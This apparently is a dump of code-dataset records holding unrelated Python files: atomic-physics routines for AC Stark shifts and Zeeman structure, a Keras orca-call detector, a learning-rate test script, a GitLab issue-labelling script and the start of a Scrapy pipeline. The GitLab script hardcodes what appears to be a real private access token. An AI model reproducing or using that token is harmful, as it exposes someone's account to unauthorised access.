0: # use intensity from field\r\n I = 2 * self.field.P / np.pi / self.field.w0**2 # beam intensity\r\n\r\n Rsc = 0\r\n for i in range(len(self.Isats)):\r\n deltas = omegas - 2 * np.pi * c / self.Drws[i] # detuning from D line\r\n Rsc += self.Dlws[i]/2. * I/self.Isats[i] / (1 + 4*(deltas/self.Dlws[i])**2 + I/self.Isats[i])\r\n\r\n return Rsc\r\n \r\n def acStarkShift(self, x=0, y=0, z=0, wavel=[], mj=None, HF=False):\r\n \"\"\"Return the potential from the dipole interaction \r\n U = -E = -1/2 Re[alpha] E^2\r\n Then taking the time average of the cos^2(wt) AC field term we get \r\n U = -1/4 Re[alpha] E^2\"\"\"\r\n return -self.polarisability(wavel, mj, HF, split=False) /4. *np.abs( \r\n self.field.amplitude(x,y,z) )**2\r\n \r\n \r\n def polarisability(self, wavel=[], mj=None, HF=False, split=False):\r\n \"\"\"wavel: wavelength (m) - default is self.field.lam\r\n mj: used when hyperfine splitting is negligible.\r\n HF: Boolean - include hyperfine structure\r\n split: Boolean - False gives total polarisability, True splits into\r\n scalar, vector, and tensor.\r\n Return the polarisability as given Arora 2007 (also see Cooper 2018,\r\n Mitroy 2010, Kein 2013) assuming that J and mj are good quantum \r\n numbers when hyperfine splitting can be neglected, or that F and mf are\r\n good quantum numbers. Assumes linear polarisation so that the vector\r\n polarisability is zero.\"\"\"\r\n if np.size(wavel) != 0: \r\n omegas = np.array(2*np.pi*c/wavel) # laser frequencies (rad/s)\r\n else:\r\n omegas = self.omegas\r\n \r\n # initiate arrays for results\r\n empty = np.zeros(np.size(omegas))\r\n aSvals, aVvals, aTvals = empty.copy(), empty.copy(), empty.copy()\r\n \r\n for ii in range(np.size(omegas)):\r\n aS, aV, aT = 0, 0, 0\r\n #print([self.omega0.shape,self.gam.shape,omegas.shape])\r\n # loop over final states\r\n for i in range(len(self.states)): \r\n if np.size(omegas) > 1:\r\n Ep = hbar*(self.omega0[i] + omegas[ii] + 1j*self.gam[i])\r\n Em = hbar*(self.omega0[i] - omegas[ii] - 1j*self.gam[i])\r\n \r\n else:\r\n Ep = hbar*(self.omega0[i] + omegas + 1j*self.gam[i])\r\n Em = hbar*(self.omega0[i] - omegas - 1j*self.gam[i])\r\n \r\n aS += 1/3. /(2.*self.J + 1.) *self.D0s[i]**2 * (1/Ep + 1/Em)\r\n \r\n aV += 0.5*(-1)**(self.J + 2 + self.states[i][2]) * np.sqrt(6*self.J\r\n /(self.J + 1.) /(2*self.J + 1.)) * self.D0s[i]**2 * wigner6j(\r\n 1, 1, 1, self.J, self.states[i][2], self.J) * (1/Em - 1/Ep)\r\n \r\n aT += 2*np.sqrt(5 * self.J * (2*self.J - 1) / 6. /(self.J + 1) /\r\n (2*self.J + 1) / (2*self.J + 3)) * (-1)**(self.J + \r\n self.states[i][2]) * wigner6j(self.J, 1, self.states[i][2], \r\n 1, self.J, 2) * self.D0s[i]**2 * (1/Ep + 1/Em)\r\n \r\n aSvals[ii] = aS.real # scalar polarisability\r\n aVvals[ii] = aV.real # vector polarisability\r\n aTvals[ii] = aT.real # tensor polarisability\r\n\r\n # combine polarisabilities\r\n u = self.field.ehat\r\n if self.J > 0.5:\r\n if HF: # hyperfine splitting is significant\r\n # from Kien 2013: when stark shift << hfs splitting so there isn't mixing of F levels\r\n # combine eq 16 and 18 to get the a_nJF in terms of the a_nJ\r\n # also assume stark shift << Zeeman splitting so we can use |F,MF> states.\r\n aVvals *= -(-1)**(self.J + self.I + self.F) * np.sqrt(self.F * (2*self.F + 1)\r\n *(self.J + 1) *(2*self.J + 1) /self.J /(self.F + 1)) *wigner6j(self.F, 1, self.F, \r\n self.J, self.I, self.J)\r\n \r\n # from Arora 2007\r\n aTvals *= (-1)**(self.I + self.J - self.MF) * (2*self.F + 1\r\n ) * np.sqrt((self.J + 1) *(2*self.J + 1) *(2*self.J + 3)\r\n /self.J /(2*self.J - 1.)) * wigner3j(self.F, 2, self.F, \r\n self.MF, 0, -self.MF) * wigner6j(self.F, 2, self.F,\r\n self.J, self.I, self.J) \r\n \r\n if split:\r\n return (aSvals, aVvals, aTvals)\r\n else: \r\n return aSvals + aTvals\r\n \r\n else: # hyperfine splitting is ignored\r\n # NB: currently ignoring vector polarisability as in Arora 2007\r\n if split:\r\n return (aSvals, aVvals, aTvals)\r\n else:\r\n # return aSvals + aTvals * (3*mj**2 - self.J*(self.J + 1)\r\n # ) / self.J / (2*self.J - 1)\r\n # include a general polarisation of light:\r\n return aSvals + mj/self.J * np.imag(np.conj(u[0])*u[1]\r\n ) * aVvals + (3*abs(u[2])**2 - 1)/2. * (3*mj**2 - \r\n self.J*(self.J + 1)) / self.J / (2*self.J - 1) * aTvals\r\n else:\r\n if HF: # there is no tensor polarisability for the J=1/2 state\r\n aVvals *= -(-1)**(self.J + self.I + self.F) * np.sqrt(self.F * (2*self.F + 1)\r\n *(self.J + 1) *(2*self.J + 1) /self.J /(self.F + 1)) *wigner6j(self.F, 1, self.F, \r\n self.J, self.I, self.J)\r\n if split:\r\n return (aSvals, aVvals, aTvals)\r\n else:\r\n return aSvals #+ aVvals\r\n else:\r\n if split:\r\n return (aSvals, aVvals, aTvals)\r\n else:\r\n if mj == None: # for compatability with old scripts\r\n mj = 0\r\n return aSvals+ mj/self.J*np.imag(np.conj(u[0])*u[1])*aVvals\r\n \r\n def matrix_element(self,f1,m1,f2,m2,q = 0):\r\n \"\"\"\r\n Calculate the gI*I + gJ*J matrix element for the zeeman hamiltonian, using indices as arguments.\r\n :return: The value of < f1,m1| gI*I + gJ*J |f2,m2>\r\n :param q: Spherical tensor rank of the incoming field, should be in [-1, 0, 1]\r\n function taken from https://github.com/cyip92/microwave-dressing.git \r\n The exact expression in F mF basis can be found in https://arxiv.org/pdf/1309.5775.pdf\r\n \"\"\"\r\n I = self.I\r\n J = self.J\r\n g_I = self.gI\r\n g_J = self.gJ\r\n if abs(f1 - f2) > 1 or abs(m1 - m2) > 1: # Selection rules cut out a lot of time\r\n return 0\r\n reduced = ((-1) ** (1 + I + J)) * np.sqrt(2*f1 + 1)\r\n elem_i = ((-1) ** f2) * np.sqrt(I * (I + 1) * (2*I + 1)) * wigner6j(I, J, f1, f2, 1, I)\r\n elem_j = ((-1) ** f1) * np.sqrt(J * (J + 1) * (2*J + 1)) * wigner6j(J, I, f1, f2, 1, J)\r\n elem = ((-1) ** q) * reduced * (g_I * elem_i + g_J * elem_j) * clebschgordan(f1, 1, f2, m1, q, m2)\r\n return elem \r\n \r\n def diagH(self, x = 0, y = 0, z = 0, Bfield = 0):\r\n \r\n \"\"\"Diagonalise the combined Hamiltonian of hyperfine splitting + the ac\r\n Stark Shift + the zeeman effect. This gives the eigenenergies and eigenstates in the |F,mF>\r\n basis at a particular wavelength. Currently assuming linear polarisation\r\n along the z direction as in Arora 2007.\"\"\"\r\n wavel = self.field.lam\r\n omega = 2*np.pi*c/wavel # laser frequency in rad/s\r\n \r\n # |I-J| <= F <= I+J\r\n Fs = np.arange(abs(int(self.I - self.J)), int(self.I + self.J + 1)) #List of F states\r\n num_states = sum(2*Fs + 1) #Total number of states.\r\n \r\n H = np.zeros((num_states, num_states)) # Initialize combined interaction Hamiltonian\r\n F_labels = np.concatenate([[F]*(2*F+1) for F in Fs]) #F label of each state\r\n \r\n MF_labels = np.concatenate([list(range(-F,F+1)) for F in Fs]) #m_F label of each state\r\n \r\n Hhfs = np.zeros(num_states) # diagonal elements of the hfs Hamiltonian\r\n # state vector: (|F0 -F0>, |F0 -F0+1>, ..., |F0 F0>, |F1 -F1>, ..., |FN FN>)\r\n for F in Fs:\r\n for MF in range(-F, F+1):\r\n # hyperfine interaction is diagonal in F and mF:\r\n G = F*(F + 1) - self.I*(self.I + 1) - self.J*(self.J + 1)\r\n if self.J == 0.5:\r\n Vhfs = h/2. * self.Ahfs * G # no quadrupole\r\n else:\r\n Vhfs = h/2. * (self.Ahfs * G + self.Bhfs/4. * (3*G*(G + 1)\r\n - 4*self.I*(self.I + 1) * self.J*(self.J + 1)) / self.I\r\n /(2*self.I - 1.) /self.J /(2*self.J - 1.))\r\n \r\n # stark interaction is diagonal in mF\r\n # since the Hamiltonian is Hermitian, we only need to fill the lower triangle\r\n i = 2*F - min(Fs) + MF + np.sum(2*np.arange(min(Fs),F)) # horizontal index of Hamiltonian\r\n \r\n Fps = np.arange(min(Fs), F+1) # F'\r\n \r\n Hhfs[i] = Vhfs\r\n \r\n # not making the rotating wave approximation\r\n Ep = hbar*(self.omega0 + omega + 1j*self.gam)\r\n Em = hbar*(self.omega0 - omega - 1j*self.gam)\r\n \r\n aS = np.sum(self.D0s**2 /3. /(2.*self.J + 1.) * (1/Ep + 1/Em))\r\n \r\n aT = 0\r\n for ii in range(len(self.D0s)): # wigner6j function takes scalars\r\n aT += (-1)**(self.J + self.states[ii][2] + 1\r\n ) * wigner6j(self.J, 1, self.states[ii][2], 1, \r\n self.J, 2) * self.D0s[ii]**2 * (1/Ep[ii] + 1/Em[ii])\r\n \r\n for Fp in Fps:\r\n if Fp >= abs(MF):\r\n # due to symmetry, only some of the matrix elements need filling\r\n j = Fp + MF + np.sum(2*np.arange(min(Fs),Fp) + 1)\r\n \r\n aT_F = aT * 4*np.sqrt(5/6. * (2*F + 1) * (2*Fp + 1)) * (-1)**(\r\n self.J + self.I + F - Fp - MF) * wigner3j(F, 2, \r\n Fp, MF, 0, -MF) * wigner6j(F, 2, Fp, self.J, \r\n self.I, self.J)\r\n if F == Fp: \r\n # The hyperfine splitting is diagonal in |F,MF> \r\n H[i,j] = -0.25 * (aS.real + aT_F.real) * np.abs( \r\n self.field.amplitude(x,y,z) )**2 + Vhfs\r\n else: \r\n # state mixing is only from the anisotropic polarisability\r\n H[i,j] = -0.25 * aT_F.real * np.abs( self.field.amplitude(x,y,z) )**2\r\n \r\n #Zeeman Hamiltonian\r\n for Fp in Fps:\r\n for MFp in range(-Fp, Fp+1):\r\n j = 2*Fp - min(Fs) + MFp + np.sum(2*np.arange(min(Fs),Fp)) # vertical index of Hamiltonian\r\n #keep only lower triangle\r\n if j <=i:\r\n #print([F, MF], [Fp, MFp] , [i, j])\r\n H[i,j] =H[i,j] + Bfield*bohr_magneton *self.matrix_element(F,MF,Fp,MFp)\r\n #print(self.matrix_element(F,MF,Fp,MFp)/self.matrix_element(1,0,1,0))\r\n \r\n \r\n # could fill the rest of H from symmetry: # H = H + H.T - np.diagflat(np.diag(H))\r\n # diagonalise the Hamiltonian to find the combined shift\r\n # since it's hermitian np can diagonalise just from the lower traingle\r\n eigenvalues, eigenvectors = np.linalg.eigh(H, UPLO='L')\r\n \r\n # to get the Stark shift, subtract off the hyperfine shift\r\n Hac = eigenvalues - Hhfs\r\n \r\n # note: the diagonalisation in numpy will likely re-order the eigenvectors\r\n # assume the eigenvector is that closest to the original eigenvector\r\n indexes = np.argmax(abs(eigenvectors), axis=1)\r\n #return Hac[indexes], eigenvectors[:,indexes], Hhfs[indexes], F_labels, MF_labels\r\n return eigenvalues, eigenvectors\r\n \r\n def ufunc(self,K,q,u):\r\n \"\"\"\r\n :param u: Spherical tensor rank of the light field, should be in [-1, 0, 1].\r\n Expression is eqn 12 in https://doi.org/10.1140/epjd/e2013-30729-x\r\n \"\"\"\r\n V = 0\r\n vec = [-1,0,1]\r\n for m in vec:\r\n for m1 in vec:\r\n V = V + (-1.00+0j)**(q+m1)*u[m+1]*np.conj(u[-m1+1]+0j)*np.sqrt(2*K+1)*wigner3j(1, K,1, m, -q, m1)\r\n return V\r\n\r\n def alpha_func(self,K):\r\n \"\"\"\r\n Expression is eqn 11 in https://doi.org/10.1140/epjd/e2013-30729-x\r\n \"\"\"\r\n \r\n I = self.I\r\n J = self.J\r\n C = (-1.00+0j)**(K+J+1) * np.sqrt(2*K+1)\r\n wavel = self.field.lam\r\n omega = 2*np.pi*c/wavel # laser frequency in rad/s\r\n alpha = 0 \r\n for ii in range(len(self.D0s)): # sum over all the transitions\r\n Jd = self.states[ii][2]\r\n # not making the rotating wave approximation\r\n Ep = hbar*(self.omega0[ii] + omega + 1j*self.gam[ii])\r\n Em = hbar*(self.omega0[ii] - omega - 1j*self.gam[ii])\r\n alpha += (-1.00+0j)**Jd * wigner6j(1, K, 1, J,Jd,J) * self.D0s[ii]**2 * (((-1)**K)/Ep + 1/Em).real\r\n return C*alpha\r\n \r\n def ac_stark_matrix_element(self,f1,m1,f2,m2,u):\r\n \"\"\"\r\n Exact matrix element for the ac-stark shifts. Includes all contributions, Scalar, vector and tensor.\r\n :param u: Spherical tensor rank of the light field, should be in [-1, 0, 1].\r\n :return: The value of < f1,m1| gI*I + gJ*J |f2,m2>\r\n Expression is eqn 10 in https://doi.org/10.1140/epjd/e2013-30729-x\r\n \"\"\"\r\n V = 0\r\n I = self.I\r\n J = self.J\r\n \r\n for K in range(3):\r\n for q in np.arange(-K,K+1):\r\n V = V + self.alpha_func(K)*self.ufunc(K,q,u)*(-1.00+0j)**(J+I+K+q-m1)*np.sqrt((2*f1+1)*(2*f1+1))*wigner3j(f1, K,f2, m1, q, -m2) * wigner6j(f1, q, f2, J, I, J)\r\n return V\r\n \r\n def diagHV(self, x = 0, y = 0, z = 0, Bfield = 0, u = [0,1,0]):\r\n wavel = self.field.lam\r\n \"\"\"Diagonalise the combined Hamiltonian of hyperfine splitting + the ac\r\n Stark Shift + the zeeman effect. This gives the eigenenergies and eigenstates in the |F,mF>\r\n basis at a particular wavelength. This works for arbitrary polrization of the light. \"\"\"\r\n omega = 2*np.pi*c/wavel # laser frequency in rad/s\r\n \r\n # |I-J| <= F <= I+J\r\n Fs = np.arange(abs(int(self.I - self.J)), int(self.I + self.J + 1)) #List of F states\r\n num_states = sum(2*Fs + 1) #Total number of states.\r\n \r\n H = np.zeros((num_states, num_states)) + 0j # Initialize combined interaction Hamiltonian\r\n F_labels = np.concatenate([[F]*(2*F+1) for F in Fs]) #F label of each state\r\n \r\n MF_labels = np.concatenate([list(range(-F,F+1)) for F in Fs]) #m_F label of each state\r\n \r\n Hhfs = np.zeros(num_states) # diagonal elements of the hfs Hamiltonian\r\n # state vector: (|F0 -F0>, |F0 -F0+1>, ..., |F0 F0>, |F1 -F1>, ..., |FN FN>)\r\n for F in Fs:\r\n # hyperfine interaction is diagonal in F and mF:\r\n G = F*(F + 1) - self.I*(self.I + 1) - self.J*(self.J + 1)\r\n if self.J == 0.5:\r\n Vhfs = h/2. * self.Ahfs * G # no quadrupole\r\n #print(self.Ahfs * G/2*1e-6)\r\n else:\r\n Vhfs = h/2. * (self.Ahfs * G + self.Bhfs/4. * (3*G*(G + 1)\r\n - 4*self.I*(self.I + 1) * self.J*(self.J + 1)) / self.I\r\n /(2*self.I - 1.) /self.J /(2*self.J - 1.))\r\n #print(Vhfs/h*1e-6)\r\n for MF in range(-F, F+1):\r\n # stark interaction is diagonal in mF\r\n # since the Hamiltonian is Hermitian, we only need to fill the lower triangle\r\n i = 2*F - min(Fs) + MF + np.sum(2*np.arange(min(Fs),F)) # horizontal index of Hamiltonian\r\n \r\n Fps = np.arange(min(Fs), F+1) # F'\r\n \r\n Hhfs[i] = Vhfs\r\n\r\n for Fp in Fps:\r\n for MFp in range(-Fp, Fp+1):\r\n j = 2*Fp - min(Fs) + MFp + np.sum(2*np.arange(min(Fs),Fp)) # vertical index of Hamiltonian\r\n #keep only lower triangle\r\n if j <=i:\r\n \r\n #Zeeman Hamiltonian\r\n H[i,j] =H[i,j] + Bfield*bohr_magneton *self.matrix_element(F,MF,Fp,MFp)\r\n \r\n #AC stark hamiltonian\r\n Hac = (1/4.00)*self.ac_stark_matrix_element(F,MF,Fp,MFp,u)* np.abs(self.field.amplitude(x,y,z))**2 \r\n H[i,j] = H[i,j] + Hac\r\n \r\n #print([F, MF], [Fp, MFp] , [i, j])\r\n #print(Hac/h*1e-6)\r\n \r\n # Add hyperfine interaction\r\n if F == Fp and MF == MFp: \r\n # The hyperfine splitting is diagonal in |F,MF> \r\n H[i,j] = H[i,j] + Vhfs\r\n #print([F, MF], [Fp, MFp] , [i, j])\r\n # could fill the rest of H from symmetry: # H = H + H.T - np.diagflat(np.diag(H))\r\n # diagonalise the Hamiltonian to find the combined shift\r\n # since it's hermitian np can diagonalise just from the lower traingle\r\n eigenvalues, eigenvectors = np.linalg.eigh(H, UPLO='L')\r\n \r\n # to get the Stark shift, subtract off the hyperfine shift\r\n #Hac = eigenvalues - Hhfs\r\n #\r\n # note: the diagonalisation in numpy will likely re-order the eigenvectors\r\n # assume the eigenvector is that closest to the original eigenvector\r\n #indexes = np.argmax(abs(eigenvectors), axis=1)\r\n #return Hac[indexes], eigenvectors[:,indexes], Hhfs[indexes], F_labels, MF_labels\r\n return eigenvalues, eigenvectors\r\n \r\n def zeeman_map(self,Bfield_min=1,Bfield_max=2,Bfield_int=1):\r\n 'This filed gives the zeeman map for the values specified in Bfield_array'\r\n # compare polarisability of excited states\r\n y = []\r\n Bfield_array = np.arange(Bfield_min,Bfield_max,Bfield_int)\r\n for Bfield in Bfield_array:\r\n ev, evec = self.diagHV(Bfield = Bfield*1e-4)\r\n y.append(ev)\r\n X = []\r\n Y = []\r\n for i in range(len(Bfield_array)):\r\n for j in range(len(y[i])):\r\n X.append(Bfield_array[i])\r\n Y.append(y[i][j]/h*1e-9)\r\n plt.figure()\r\n plt.title(\"Zeeman structure of \"+self.X + 'in state [L,J] = ' + str([self.L,self.J]))\r\n plt.scatter(X, Y, s=10, linewidth=0, zorder=2, picker=5)\r\n plt.xlabel(\"Magnetic field (Gauss)\")\r\n plt.ylabel(\"Energy (GHz)\")\r\n\r\nif __name__ == \"__main__\":\r\n # run GUI by passing an arg:\r\n if np.size(sys.argv) > 1 and sys.argv[1] == 'rungui':\r\n AFF.runGUI()\r\n sys.exit() # don't run any of the other code below\r\n Rb = atom(atm = 'Rb87')\r\n AFF.vmfSS(Rb)\r\n\r\n # combinedTrap(Cswl = 1064e-9, # wavelength of the Cs tweezer trap in m\r\n # Rbwl = 810e-9, # wavelength of the Rb tweezer trap in m\r\n # power = 5e-3, # power of Cs tweezer beam in W\r\n # Rbpower = 1e-3, # power of Rb tweezer beam in W \r\n # beamwaist = 1e-6)\r\n #check880Trap(wavels=np.linspace(795, 1100, 400)*1e-9, species='Rb')\r\n\r\n # getMFStarkShifts()\r\n # plotStarkShifts(wlrange=[800,1100])\r\n\r\n # for STATES in [[Rb5S, Rb5P],[Cs6S, Cs6P]]:\r\n # plt.figure()\r\n # plt.title(\"AC Stark Shift in \"+STATES[0].X+\"\\nbeam power %.3g mW, beam waist %.3g $\\mu$m\"%(power*1e3,beamwaist*1e6))\r\n # plt.plot(wavels*1e9, STATES[0].acStarkShift(0,0,0,wavels)/kB*1e3, 'tab:blue', label='Ground S$_{1/2}$')\r\n # excited_shift = 0.5*(STATES[1].acStarkShift(0,0,0,wavels,mj=0.5) + STATES[1].acStarkShift(0,0,0,wavels,mj=1.5))\r\n # plt.plot(wavels*1e9, excited_shift/kB*1e3, 'r-.', label='Excited P$_{3/2}$')\r\n # plt.legend()\r\n # plt.ylabel(\"Trap Depth (mK)\")\r\n # plt.xlabel(\"Wavelength (nm)\")\r\n # plt.xlim(wavels[0]*1e9, wavels[-1]*1e9)\r\n # plt.ylim(-5,5)\r\n # plt.plot(wavels*1e9, np.zeros(len(wavels)), 'k', alpha=0.25) # show zero crossing\r\n # plt.show()","sub_path":"AtomFieldInt_V3.py","file_name":"AtomFieldInt_V3.py","file_ext":"py","file_size_in_byte":44121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"553881537","text":"#!/usr/bin/env python3\n# coding=utf-8\n\nimport os\n\nimport argparse\nimport logging\nimport logging.config\nfrom tensorflow.keras import optimizers\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\nfrom tensorflow.keras.layers import Dropout, Flatten, Dense, Activation\nfrom tensorflow.keras.callbacks import ReduceLROnPlateau, ModelCheckpoint\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Conv2D\nfrom tensorflow.keras.layers import Activation, Dropout, Flatten, Dense\nfrom tensorflow.keras import backend as K\n\n# Disable PIL.PngImagePlugin DEBUG logs\nlogging.config.dictConfig({\n 'version': 1,\n 'disable_existing_loggers': True,\n})\n\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\n\ndef train(model, img_width, img_height, train_data_path, validation_data_path):\n '''Train the Detection model'''\n nb_train_samples = sum(len(files)\n for _, _, files in os.walk(train_data_path))\n nb_validation_samples = sum(len(files)\n for _, _, files in os.walk(validation_data_path))\n\n epochs = 250\n batch_size = 256\n checkpoint = ModelCheckpoint(filepath='checkpoint_orcacnn-{epoch:02d}-{val_loss:.2f}.h5',\n monitor='val_loss', verbose=0, save_best_only=True)\n\n reduce_lr = ReduceLROnPlateau(monitor='val_loss', factor=0.1,\n patience=100, min_lr=1e-8)\n\n train_datagen = ImageDataGenerator(rescale=1. / 255,\n shear_range=0.2,\n zoom_range=0.2)\n\n # only rescaling\n test_datagen = ImageDataGenerator(rescale=1. / 255)\n\n # Change the batchsize according to your system RAM\n train_batchsize = 256\n val_batchsize = 256\n\n train_generator = train_datagen.flow_from_directory(\n train_data_path,\n target_size=(img_width, img_height),\n batch_size=train_batchsize,\n class_mode='binary',\n shuffle=True)\n\n validation_generator = test_datagen.flow_from_directory(\n validation_data_path,\n target_size=(img_width, img_height),\n batch_size=val_batchsize,\n class_mode='binary',\n shuffle=False)\n\n model.fit_generator(\n train_generator,\n steps_per_epoch=nb_train_samples // batch_size,\n epochs=epochs,\n validation_data=validation_generator,\n validation_steps=nb_validation_samples // batch_size,\n callbacks=[checkpoint, reduce_lr])\n\n model.save('orca_detection_adam_.h5')\n\n logger.info(\"Detection Model saved\")\n\n\nclass OrcaNet:\n @staticmethod\n def build(img_width, img_height):\n '''Build CNN for Orca Detection'''\n if K.image_data_format() == 'channels_first':\n input_shape = (3, img_width, img_height)\n else:\n input_shape = (img_width, img_height, 3)\n\n model = Sequential()\n model.add(Conv2D(32, (5, 5), padding='same', strides=2, input_shape=input_shape))\n model.add(Conv2D(32, (5, 5), padding='same', strides=2))\n model.add(Activation('relu'))\n model.add(Dropout(0.4))\n\n model.add(Conv2D(32, (5, 5), strides=2, padding='same'))\n model.add(Conv2D(32, (5, 5), strides=2, padding='same'))\n model.add(Activation('relu'))\n model.add(Dropout(0.4))\n\n model.add(Conv2D(64, (5, 5), strides=2, padding='same'))\n model.add(Conv2D(64, (5, 5), strides=2, padding='same'))\n model.add(Activation('relu'))\n model.add(Dropout(0.5))\n\n model.add(Conv2D(64, (5, 5), strides=2, padding='same'))\n model.add(Conv2D(64, (5, 5), strides=2, padding='same'))\n model.add(Activation('relu'))\n model.add(Dropout(0.5))\n\n model.add(Flatten())\n model.add(Dense(256))\n model.add(Activation('relu'))\n\n model.add(Dense(1))\n model.add(Activation('sigmoid'))\n\n model.summary()\n\n return model\n\n\ndef main(args):\n dataset_path = args.classpath\n\n train_data_path = os.path.join(dataset_path, 'train_orca/')\n validation_data_path = os.path.join(dataset_path, 'val_orca/')\n\n img_width, img_height = 200, 300\n\n logger.info(\"Starting compiling of OrcaNet ... \")\n model = OrcaNet.build(img_width=img_width, img_height=img_height)\n model.compile(loss='binary_crossentropy',\n optimizer=optimizers.Adam(lr=3e-5),\n metrics=['accuracy'])\n logger.info(\"Starting Training ... \")\n train(model=model, img_width=img_width, img_height=img_height, train_data_path=train_data_path,\n validation_data_path=validation_data_path)\n\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser(\n description=\"Train CNN model for detection of orca calls in spectrograms\")\n parser.add_argument(\n '-c',\n '--classpath',\n type=str,\n help='directory with pos and neg samples in two respective folders',\n required=True)\n\n args = parser.parse_args()\n\n main(args)\n","sub_path":"app/Detection/orcacnn_detection.py","file_name":"orcacnn_detection.py","file_ext":"py","file_size_in_byte":5048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"266045609","text":"import sys\nimport os\nimport datetime\nimport copy\n\nsys.path.append('..')\n\nfrom ..data.dataloader.build import create_dataloader\nfrom ..model.build import build_model\nfrom ..solver.optimizer import create_optimizer\nfrom ..solver.lr_scheduler import wrapper_lr_scheduler\nfrom ..utils.utils import *\nfrom ..engine.lr_range_tester import *\n\n# from data.dataloader import create_dataloader\nfrom ..configs import load_args, merge_from_arg\n\nif __name__ == '__main__':\n\n init_torch_seeds(1)\n\n arg = vars(load_args())\n config_file = arg['config_file']\n\n # configs/resnet50_baseline.py => configs.resnet50_baseline\n config_file = config_file.replace(\"../\", \"\").replace('.py', '').replace('/', '.')\n # print(config_file)\n\n # from configs.resnet50_baseline import config as cfg\n exec(r\"from {} import config as cfg\".format(config_file))\n # print(cfg['tag'], cfg['max_num_devices'])\n\n # 脚本输入参数替换掉字典输入\n cfg = merge_from_arg(cfg, arg)\n cfg_copy = copy.deepcopy(cfg)\n\n train_dataloader = create_dataloader(cfg['train_pipeline'])\n val_dataloader = create_dataloader(cfg['val_pipeline'])\n\n print('train_dataloader: ', len(train_dataloader))\n print('val_dataloader: ', len(val_dataloader))\n\n current_time = datetime.datetime.now()\n time_str = datetime.datetime.strftime(current_time, '%Y%m%d_')\n save_dir = os.path.join(cfg['save_dir'], time_str, cfg['tag'])\n log_dir = os.path.join(cfg['log_dir'], \"log_\" + time_str + cfg['tag'])\n cfg['save_dir'] = save_dir\n cfg['log_dir'] = log_dir\n if not os.path.isdir(save_dir):\n os.makedirs(save_dir)\n if not os.path.isdir(log_dir):\n os.makedirs(log_dir)\n print('Save dir: ', save_dir)\n print('Log dir: ', log_dir)\n\n model = build_model(cfg, pretrain_path=arg['load_path'])\n optimizer = create_optimizer(cfg['optimizer'], model)\n lr_scheduler = wrapper_lr_scheduler(cfg['lr_scheduler'], optimizer)\n\n if arg['device']:\n free_device_ids = arg['device']\n else:\n free_device_ids = get_free_device_ids()\n\n max_num_devices = cfg['max_num_devices']\n if len(free_device_ids) >= max_num_devices:\n free_device_ids = free_device_ids[:max_num_devices]\n\n print('free_device_ids: ', free_device_ids)\n\n master_device = free_device_ids[0]\n model.cuda(master_device)\n model = nn.DataParallel(model, device_ids=free_device_ids).cuda(master_device)\n\n cfg_copy['save_dir'] = save_dir # 更新存储目录\n cfg_copy['log_dir'] = log_dir # 更新存储目录\n\n do_lr_range_test(cfg_copy, model=model, train_loader=train_dataloader, val_loader=val_dataloader, optimizer=optimizer,\n scheduler=lr_scheduler, device=master_device)\n","sub_path":"classification/tools/lr_range_test.py","file_name":"lr_range_test.py","file_ext":"py","file_size_in_byte":2720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"594928041","text":"import requests\nprivateToken = 'kSeX-psAkxw3NGBabgUy'\nprivateTokenStr = 'private_token={}'.format(privateToken)\nprojectId = 15617391\nprefix = 'https://gitlab.com/api/v4/projects/{}'.format(projectId)\n\ncategories = [\n\t{\n\n\t\t\"label\": {\n \"id\": \"Journal Account\",\n\t\t\t\"name\": \"journal-account\",\n\t\t\t\"color\": \"#3450f6\"\n\t\t},\n \"label\":{\n \"id\":\"Patient Account\",\n \"name\": \"patient-account\",\n \"color\": \"#3450f6\"\n }\n\t}\n]\n\nfor category in categories:\n\tlabel = category.get('label')\n\tresp = requests.post('{}/labels?{}'.format(prefix, privateTokenStr), json = label)\n\tif resp.status_code != 201:\n\t\tif resp.status_code != 409: # Label already exists\n\t\t\traise Exception('POST /labels/: {} - {}'.format(resp.status_code, resp.text))\n\nresp = requests.get('{}/issues?{}'.format(prefix, privateTokenStr))\nif resp.status_code != 201:\n\t\traise Exception('GET /issues/: {} - {}'.format(resp.status_code, resp.text))\n\njsonResp = resp.json()\nif not isinstance(jsonResp, list):\n\tjsonResp = [jsonResp]\n\nfor issue in jsonResp:\n title = issue.get('title')\n serviceDeskStr = 'Service Desk'\n if serviceDeskStr in title:\n for category in categories:\n tag = '[{}]'.format(category.get('id'))\n if tag in title:\n label = category.get('label')\n issueIid = issue.get('id')\n labelName = label.get('name')\n assignLabels = issue.get('labels')\n if not labelName in assignLabels:\n assignLabels.append(label.get('name'))\n updateData = { \"labels\": assignLabels }\n resp = requests.put('{}/issues/{}?{}'.format(prefix,\n\t\t\t\t\tissueIid, privateTokenStr), json=updateData)\n if resp.status_code != 200:\n raise Exception('PUT /issues/{}/: {} - {}'.format(issueIid,\n\t\t\t\t\t\tresp.status_code, resp.text))","sub_path":"app/support/gitlab-tickets.py","file_name":"gitlab-tickets.py","file_ext":"py","file_size_in_byte":1916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"352575216","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html\nfrom hashlib import md5\nimport json\nfrom twisted.enterprise import adbapi\nfrom scrapy import log\nfrom scrapy.utils.project import get_project_settings\n\nfrom sweep.utils import get_string, EMAIL_REGEX, URL_REGEX\n\n\nsettings = get_project_settings()\n\n\nclass SweepPipeline(object):\n \"\"\"A pipeline to store the item in a json format\n \"\"\"\n def __init__(self):\n self.file = open('items.json', 'wb')\n\n def process_item(self, item, spider):\n line = json.dumps(dict(item)) + \"\\n\"\n self.file.write(line)\n return item\n\n\nclass CleanPipeline(object):\n \"\"\"A pipeline to clean item\n \"\"\"\n def __init__(self):\n pass\n\n def process_item(self, item, spider):\n for key, value in dict(item).iteritems():\n if key == \"email\":\n item[key] = get_string(value).strip() if EMAIL_REGEX.match(value) else ''\n elif key == \"website\":\n item[key] = get_string(value).strip() if 